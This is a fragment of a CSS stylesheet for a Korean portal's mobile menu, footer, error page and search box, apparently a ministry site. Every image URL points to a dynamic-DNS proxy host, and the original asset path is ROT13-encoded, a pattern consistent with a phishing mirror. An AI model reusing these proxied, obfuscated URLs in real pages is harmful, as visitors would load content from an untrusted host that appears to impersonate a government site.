    background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Sz_oga_nyyzrah.fit) no-repeat center/contain;
    text-indent: -999px;
    overflow: hidden;
  }

  .m_allmenu_wrap {
    display: block;
  }

  .m_allmenu_wrap .m_allmenu_mask {
    position: fixed;
    top: 0;
    right: 0;
    bottom: 0;
    width: 0;
    background: rgba(0, 0, 0, 0.8);
    z-index: 99;
    opacity: 0;
    transition: width 0.2s 0.2s, opacity 0.2s;
  }

  .m_allmenu_wrap .m_allmenu_cont {
    position: fixed;
    top: 0;
    right: 0;
    width: 50%;
    height: 100%;
    background: #fff;
    z-index: 100;
    transform: translateX(101%);
    transition: 0.2s;
  }
  .m_allmenu_head {
    display: flex;
    align-items: center;
    justify-content: space-between;
    height: 64px;
    padding: 0 24px 0 16px;
    border-bottom: 1px solid #d8d8d8;
    background: #fff;
  }
  .m_allmenu_head .util_list {
    display: flex;
    align-items: center;
  }
  .m_allmenu_head .util_list > li {
    position: relative;
  }
  .m_allmenu_head .util_list > li + li {
    margin-left: 8px;
    padding-left: 9px;
  }
  .m_allmenu_head .util_list > li + li:before {
    content: "";
    position: absolute;
    top: 50%;
    left: 0;
    width: 1px;
    height: 16px;
    background-color: #d8d8d8;
    transform: translateY(-50%);
  }
  .m_allmenu_head .util_list > li .util_btn {
    display: flex;
    align-items: center;
    padding: 8px;
    border-radius: 4px;
    background-color: transparent;
    font-size: 15px;
    line-height: 23px;
    font-weight: 400;
  }

  .m_allmenu_head .btn_allmenu_close {
    width: 24px;
    height: 24px;
    background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_24_pybfr_oynpx.fit) no-repeat center/contain;
    text-indent: -999px;
    overflow: hidden;
  }

  .m_allmenu {
    position: relative;
    height: calc(100vh - 64px);
    height: calc(var(--vh, 1vh) * 100 - 64px);
    overflow-y: auto;
  }

  .m_allmenu:before {
    content: "";
    position: absolute;
    top: 0;
    left: 0;
    bottom: 0;
    width: 140px;
    background: #f8f8f8;
  }

  .m_allmenu .m_gnb {
    width: 140px;
    background: #f8f8f8;
  }

  .m_allmenu .m_gnb > li > a {
    display: flex;
    align-items: center;
    position: relative;
    min-height: 58px;
    padding: 16px 24px;
    color: #1d1d1d;
    font-size: 17px;
    line-height: 26px;
    font-weight: 700;
  }

  .m_allmenu .m_gnb > li > a.active {
    margin-right: -1px;
    background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Sz_ot_tao_qrcgu_ubire.cat) no-repeat right center/cover;
    color: #fff;
    z-index: 2;
  }

  .m_allmenu .m_gnb .depth_box {
    display: none;
    flex-direction: column;
    position: absolute;
    top: 0;
    right: 0;
    bottom: 0;
    left: 140px;
    min-height: 0;
    border-left: 1px solid #d8d8d8;
    background: #fff;
    overflow-y: auto;
  }
  .m_allmenu .m_gnb .depth_box .depth_tit {
    flex: none;
    padding: 19px 24px;
    font-size: 17px;
    line-height: 26px;
    font-weight: 700;
  }

  .m_allmenu .m_gnb > li > a.active + .depth_box {
    display: flex;
  }

  .m_allmenu .m_gnb .depth_box .depth {
    position: relative;
    padding: 8px 0 88px;
    margin: 0 16px;
    border-top: 1px solid #d8d8d8;
  }
  .m_allmenu .m_gnb .depth_box .depth::after {
    content: "";
    position: absolute;
    right: -16px;
    bottom: 0;
    left: -16px;
    height: 1px;
    background-color: #d8d8d8;
  }

  .m_allmenu .m_gnb .depth_box .depth > li > a {
    display: block;
    position: relative;
    padding: 20px 16px;
    border-radius: 10px;
    color: #1d1d1d;
    font-size: 17px;
    line-height: 26px;
    font-weight: 400;
    transition: 0.2s;
  }

  .m_allmenu .m_gnb .depth_box .depth > li > a.in_ul {
    padding-right: 44px;
  }
  .m_allmenu .m_gnb .depth_box .depth > li > a.in_ul::after {
    content: "";
    position: absolute;
    top: 50%;
    right: 16px;
    width: 20px;
    height: 20px;
    margin-top: -10px;
    background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_20_qbja_tenl.fit) no-repeat center/contain;
    transition: 0.2s;
  }

  .m_allmenu .m_gnb .depth_box .depth > li > a[target="_blank"] {
    padding-right: 44px;
  }
  .m_allmenu .m_gnb .depth_box .depth > li > a[target="_blank"]::after {
    content: "";
    position: absolute;
    top: 50%;
    right: 16px;
    width: 20px;
    height: 20px;
    margin-top: -10px;
    background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_20_oynax_tenl.fit) no-repeat center/contain;
  }

  .m_allmenu .m_gnb .depth_box .depth > li > a.active {
    background-color: #f2f4f8;
  }

  .m_allmenu .m_gnb .depth_box .depth > li > a.active.in_ul::after {
    transform: rotate(180deg);
  }

  .m_allmenu .m_gnb .depth_box .depth > li > .depth02 {
    display: none;
  }

  .m_allmenu .m_gnb .depth_box .depth > li > .depth02 > li > a {
    display: block;
    position: relative;
    padding: 14px 16px 14px 28px;
    color: #1d1d1d;
    font-size: 17px;
    line-height: 26px;
    font-weight: 400;
  }
  .m_allmenu .m_gnb .depth_box .depth > li > .depth02 > li > a::before {
    content: "";
    position: absolute;
    top: 25px;
    left: 16px;
    width: 4px;
    height: 4px;
    border-radius: 100%;
    background-color: #003a88;
  }

  .m_allmenu .m_gnb .depth_box .depth > li > .depth02 > li > a[target="_blank"] {
    padding-right: 40px;
  }
  .m_allmenu .m_gnb .depth_box .depth > li > .depth02 > li > a[target="_blank"]::after {
    content: "";
    position: absolute;
    top: 50%;
    right: 16px;
    width: 20px;
    height: 20px;
    margin-top: -10px;
    background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_20_oynax_tenl.fit) no-repeat center/contain;
  }

  .openAllMenu {
    width: 100%;
    height: 100%;
    overflow: hidden;
  }

  .openAllMenu .m_allmenu_wrap .m_allmenu_mask {
    width: 100%;
    opacity: 1;
    transition: width 0s, opacity 0.2s;
  }

  .openAllMenu .m_allmenu_wrap .m_allmenu_cont {
    transform: translateX(0);
  }

  .go_top {
  	right: 32px;
  }

  .foot_top_flex .logo_txtbox .tel_fax {
    flex-direction: column;
    align-items: flex-start;
    gap: 8px;
    margin-top: 8px;
  }
  .foot_top_flex {
    align-items: flex-start;
  }
  .foot_top_flex .link_btnbox {
    align-items: flex-end;
    margin-top: 52px;
  }

  .foot_bottom_flex {
    position: relative;
    padding-bottom: 40px;
  }
  .foot_bottom_flex .links_copyright .copyright {
    margin-top: 36px;
  }
  .foot_bottom_flex .otherlogo {
    position: absolute;
    right: 0;
    bottom: 32px;
  }
}

/* mobile */
@media screen and (max-width: 767px) {
  .mobile_hide {
    display: none;
  }
  .inner_center {
    padding: 0 16px;
  }

  .m_allmenu_wrap .m_allmenu_cont {
    width: 100%;
  }

  .m_head_top .logo a .logoimg {
    width: 206px;
    height: 38px;
  }
  /* .m_head_top .logo a::after {
    display: none;
  } */

  .go_top {
  	right: 16px;
  }

  .foot_top_flex {
    flex-direction: column;
  }
  .foot_top_flex .logo_txtbox .foot_logo {
    width: 170px;
    height: 32px;
  }
  .foot_top_flex .logo_txtbox .txt_box {
    margin-top: 32px;
  }
  .foot_top_flex .link_btnbox {
    align-items: flex-start;
    margin: 16px 0 0;
  }

  .foot_bottom_flex {
    flex-direction: column;
    padding-bottom: 32px;
  }
  .foot_bottom_flex .links_copyright .foot_link {
    flex-wrap: wrap;
    gap: 16px 0;
  }
  .foot_bottom_flex .links_copyright .copyright {
    margin-top: 30px;
  }
  .foot_bottom_flex .otherlogo {
    position: static;
    width: 100%;
    margin-top: 24px;
  }
}

@media screen and (max-width: 480px) {
	.m_head_util .util_txt {
		font-size: 12px;
	}
	.m_head_top .logo a .logoimg {
		width: 120px;
	}
	.m_head_top .logo a::after {
		width: 50px;
		margin-left: 4px;
	}
}

/* 2023-12-11 */
/* error */
#wrap:has(.error) header {
  display: none;
}
#wrap:has(.error) footer {
  display: none;
}
#error {
  min-height: 100vh;
  display: flex;
  align-items: center;
  justify-content: center;
}
#error .error_box {
  max-width: 534px;
}
#error .logo {
  margin-bottom: 40px;
  text-align: center;
}
#error .error_txt {
  text-align: center;
  word-break: keep-all;
}
#error .error_txt .tit {
  border-radius: 10px;
  background: #003a88;
  padding: 16px 0;
  color: #fff;
  font-weight: 700;
  font-size: 40px;
  letter-spacing: -0.025em;
}
#error .error_txt .cont {
  font-size: 24px;
  letter-spacing: -0.05em;
  color: #1c1c1c;
  margin-top: 24px;
}
#error .date {
  background: #e9f3ff;
  margin-top: 40px;
  border-radius: 10px;
  text-align: center;
  padding: 16px 0 24px;
}
#error .date .tit {
  font-size: 20px;
  letter-spacing: -0.05em;
  color: #1c1c1c;
}
#error .date .cont {
  font-size: 36px;
  letter-spacing: -0.025em;
  color: #1c1c1c;
  font-weight: 700;
  word-break: keep-all;
}
#error .date .cont .line {
  background: linear-gradient(transparent 65%, #bbdcff 35%, #bbdcff 95%, transparent 95%);
}
#error .foot_txt {
  margin-top: 16px;
  color: #003a88;
  word-break: keep-all;
  font-weight: 500;
  font-size: 20px;
  letter-spacing: -0.025em;
  text-align: center;
}

/* 준비중 */
.nocontent {
  display: block;
  width: 100%;
  height: 500px;
  padding: 24px;
  border-radius: 20px;
  background-color: #F8F8F8;
  object-fit: none;
}
@media screen and (max-width:767px){
  .nocontent {
    object-fit: contain;
  }
}


/* 자동검색  */
.search_auto {
  border: 1px solid #d8d8d8;
  position: absolute;
  top: calc(100% + 8px);
  right: 0;
  left: 0;
  border-radius: 12px;
  background: #fff;
  box-shadow: 0px 6px 12px 0px rgba(0, 0, 0, 0.12);
  z-index: 101;
}
.search_auto ul {
  display: flex;
  flex-direction: column;
  gap: 8px;
  width: 100%;
  padding: 8px 12px;
}
.search_auto ul > li {
  width: 100%;
}
.search_auto ul > li:not(:has(> a)) {
  padding: 0 13px;
  font-size: 16px;
  color: #1d1d1d;
}
.search_auto ul > li > a {
  display: block;
  color: #1d1d1d;
  font-size: 17px;
  line-height: 1.5;
}
.search_auto ul > li > a:hover,
.search_auto ul > li > a:focus {
  text-decoration: underline;
}
.search_auto ul > li > a .search_keyword {
  color: #003a88;
  font-weight: 700;
}
.search_auto ul > li > a > span > span.search_keyword {
    color: #003a88;
    font-weight: 700;
}
.search_auto .auto_close {
  display: flex;
  align-items: center;
  justify-content: flex-end;
  width: 100%;
  height: 43px;
  padding: 0 12px;
  border-top: 1px solid #d8d8d8;
  border-radius: 0 0 12px 12px;
  background: #f8f8f8;
}
.search_auto .auto_close .btn_close {
  color: #555;
  background-color: #f8f8f8;
  font-size: 15px;
  line-height: 1.5;
  font-weight: 700;
}

/* 2025-08 품질개선 (start) */
@media screen and (max-width: 1280px) {
  #header {
    display: block;
  }
  #mHeader {
    display: none;
  }
}
@media screen and (max-width: 1023px) {
  #header {
    display: none;
  }
  #mHeader {
    display: block;
  }
}
.head_top .inner_center {
  align-items: flex-end;
}
.head_top .right {
  flex-direction: column;
  align-items: flex-end;
  gap: 12px;
  padding: 16px 0;
}
.head_top .util_list {
  margin: 0 -12px;
}
.head_top .util_list > li + li {
  margin-left: 0;
  padding-left: 0;
}
.head_top .util_list > li .drop_wrap .drop_btn,
.head_top .util_list > li .util_btn {
  padding: 4.5px 12px;
}
.head_top .util_list > li .util_symbol {
  position: relative;
  font-size: 15px;
  padding: 4.5px 12px;
  display: inline-flex;
  align-items: center;
  gap: 2px;
}
.head_top .util_list > li .util_symbol:after {
  content: "";
  display: inline-block;
  width: 16px;
  height: 16px;
  background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_16_yvax_oynpx.fit);
  background-size: contain;
  background-repeat: no-repeat;
  background-position: center;
  position: relative;
  top: -1px;
}
.head_top .util_search input[type="text"] {
  padding: 0 66px 0 16px;
}
.head_top .util_search .btn_search_reset {
  position: absolute;
  top: 50%;
  right: 44px;
  width: 20px;
  height: 20px;
  transform: translateY(-50%);
  background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_12_pybfrq_oynpx.fit);
  background-size: 12px;
  background-position: center;
  background-repeat: no-repeat;
  background-color: #D8D8D8;
  border-radius: 50px;
}
.head_top .util_search input[type=text]:placeholder-shown ~ .btn_search_reset {
  display: none;
}

.m_search_con .btn_search_reset {
  position: absolute;
  top: 50%;
  right: 44px;
  width: 20px;
  height: 20px;
  transform: translateY(-50%);
  background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_12_pybfrq_oynpx.fit);
  background-size: 12px;
  background-position: center;
  background-repeat: no-repeat;
  background-color: #D8D8D8;
  border-radius: 50px;
}

.m_search_con fieldset input[type="text"]:placeholder-shown ~ .btn_search_reset {
  display: none;
}

.m_allmenu_head .m_logo a {
  display: flex;
  align-items: center;
}
.m_allmenu_head .m_logo .logoimg {
  width: 236px;
  height: 44px;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Sybtb.fit) no-repeat center/contain;
}

.m_allmenu_util .util_list {
  display: flex;
  align-items: center;
  padding: 16px 0;
  border-bottom: 1px solid #D8D8D8;
}
.m_allmenu_util .util_list > li {
  flex: 1;
  display: flex;
  align-items: center;
  justify-content: center;
  position: relative;
}
.m_allmenu_util .util_list > li + li::before {
  content: '';
  display: block;
  position: absolute;
  top: 50%;
  left: 0;
  transform: translateY(-50%);
  width: 1px;
  height: 16px;
  background: #c6c6c6;
}
.m_allmenu_util .util_list .drop_wrap .drop_btn {
  padding: 0;
}
.m_allmenu_util .util_list > li .util_symbol {
  font-size: 15px;
  display: inline-flex;
  align-items: center;
  gap: 2px;
}
.m_allmenu_util .util_list > li .util_symbol:after {
  content: "";
  display: inline-block;
  width: 16px;
  height: 16px;
  background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_16_yvax_oynpx.fit);
  background-size: contain;
  background-repeat: no-repeat;
  background-position: center;
  position: relative;
  top: -1px;
}

.foot_top_flex .logo_txtbox .tel_fax {
  flex-direction: column;
  align-items: flex-start;
  gap: 8px;
  margin-top: 16px;
}
.foot_top_flex .logo_txtbox .tel_fax dl dt {
  white-space: nowrap;
}
.foot_bottom_flex .links_copyright .foot_link > li {
  margin-right: 16px;
}
.foot_bottom_flex .links_copyright .foot_link > li > a {
  font-size: 15px;
}
@media screen and (max-width: 1280px) {
  .foot_top_flex .logo_txtbox .tel_fax {
    margin-top: 8px;
  }
}
@media screen and (max-width: 767px) {
  .foot_bottom_flex .links_copyright .foot_link > li {
    margin-right: 8px;
  }
}
/* 2025-08 품질개선 (end) */